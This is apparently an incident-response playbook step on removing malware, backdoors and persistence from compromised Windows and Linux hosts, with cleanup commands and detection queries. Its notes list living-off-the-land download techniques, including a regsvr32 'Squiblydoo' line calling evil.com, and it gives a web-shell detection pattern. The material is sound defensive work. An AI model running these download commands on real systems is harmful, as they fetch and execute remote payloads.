Remove Malware, Backdoors, and Persistence Mechanisms
Systematically remove all identified malware, backdoors, and attacker persistence mechanisms from compromised systems. Verify removal with multiple scanning engines and confirm no persistence remains.
Actions
- 1
Compile a complete list of all identified malicious artifacts: file paths, registry keys, scheduled tasks, services, cron jobs, web shells, and any other persistence mechanisms discovered during analysis.
- 2
On Windows: remove malicious scheduled tasks (`schtasks /delete /tn "TASK_NAME" /f`), services (`sc delete SERVICE_NAME`), registry Run keys, WMI event subscriptions, and startup folder entries. Use Autoruns to verify: `autorunsc.exe -a * -c -h -s -v -vt > autoruns_post_cleanup.csv`.
- 3
On Linux: remove malicious cron entries (`crontab -r -u COMPROMISED_USER`), systemd services, modified SSH authorized_keys, LD_PRELOAD entries, and files in /tmp or /dev/shm. Check for rootkits: `chkrootkit` and `rkhunter --check`.
- 4
Run full antivirus scans with updated signatures on all cleaned systems. Use at least two different AV engines for validation.
- 5
Verify removal by checking that no malicious processes are running, no beaconing to C2 infrastructure is occurring, and all identified IOCs have been removed.
- 6
Sweep common malware hiding locations: `C:\Windows\Temp\`, `C:\Users\*\AppData\Local\Temp\`, `C:\Users\*\AppData\Roaming\`, `C:\ProgramData\`, `C:\$Recycle.Bin\`, `C:\Windows\System32\` (misnamed DLLs), and `C:\Windows\WinSxS\`. Check for DLLs with anomalous timestamps or unsigned files in normally-signed directories using `sigcheck.exe -u -e C:\Windows\System32`.
- 7
Remove WMI event subscription persistence (frequently missed): `Get-WmiObject -Namespace root\subscription -Class __EventFilter`, `Get-WmiObject -Namespace root\subscription -Class __EventConsumer`, `Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding`. Delete all malicious bindings. Also check for COM object hijacking in `HKCU\Software\Classes\CLSID\` and `HKLM\Software\Classes\CLSID\` pointing to attacker DLLs.
- 8
On Linux, verify system binary integrity against the package manager: `rpm -Va` (RHEL/CentOS) or `debsums -c` (Debian/Ubuntu) to detect trojanized binaries. Check for LD_PRELOAD persistence in `/etc/ld.so.preload` and verify no malicious shared objects in `/lib/` or `/usr/lib/`. Scan for web shells in web roots: `find /var/www -name "*.php" -newer /var/log/syslog -exec grep -l "eval\|base64_decode\|system\|exec" {} \;`.
Queries
DeviceFileEvents | where Timestamp > ago(1h) | where DeviceName == "CLEANED_HOST" | where FolderPath has_any ("\Temp\","\AppData\","\ProgramData\") | where ActionType == "FileCreated" | project Timestamp, FileName, FolderPath, InitiatingProcessFileName // Verify no new malicious files after cleanupDeviceNetworkEvents | where Timestamp > ago(4h) | where DeviceName == "CLEANED_HOST" | where RemoteUrl in~ (KNOWN_C2_DOMAINS) or RemoteIP in (KNOWN_C2_IPS) | project Timestamp, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName // Verify no C2 beaconing post-cleanup
index=wineventlog sourcetype=WinEventLog:Security host=CLEANED_HOST EventCode=4688 earliest=-1h | stats count by New_Process_Name, Process_Command_Line, Account_Name | search New_Process_Name!="C:\Windows\System32\*" | sort -count
index=sysmon sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational host=CLEANED_HOST EventCode=3 earliest=-4h | stats count by DestinationIp, DestinationPort, Image | search DestinationIp!="10.*" DestinationIp!="172.16.*" DestinationIp!="192.168.*" | sort -count
Notes
Always take a forensic image of the system BEFORE beginning malware removal. The pre-cleanup state is critical evidence.
If a system has multiple persistence mechanisms or rootkit indicators, rebuilding from a clean image is safer than selective cleaning.
Common LOLBins used for malware execution that may not trigger AV: `rundll32.exe` (loading malicious DLLs), `certutil.exe -urlcache -split -f` (downloading payloads), `bitsadmin /transfer` (background downloads), `mshta.exe` (executing HTA files), and `regsvr32.exe /s /n /u /i:http://evil.com scrobj.dll` (Squiblydoo). Remove the downloaded payloads and check for persistence using these tools.